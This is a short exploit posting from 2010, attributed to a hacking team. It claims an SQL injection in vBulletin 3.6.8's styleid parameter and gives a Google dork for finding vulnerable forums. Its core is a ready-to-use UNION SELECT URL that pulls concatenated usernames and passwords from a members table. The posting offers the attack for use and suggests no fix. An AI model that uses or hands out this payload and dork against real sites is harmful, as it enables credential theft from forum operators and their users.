[D] vBulletin 3.6.8 Styleid SQL injection Vulnerabilities [z]

2010-12-23 12:41:41
Inviato da: kedans

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] vBulletin 3.6.8 Styleid SQL injection Vulnerabilities [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Go0gle Dork : Powered by vBulletin - 3.6.8

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# SQl injection --> index.php? style id=

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# Bug Console = index.php?styleid= > + SQL Dz + <

# //--> + SQL Dz + --> :

http://[Server]/vb/index.php?styleid=27+and+1=0+union+select+1,concat(uname,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members--

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x3a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.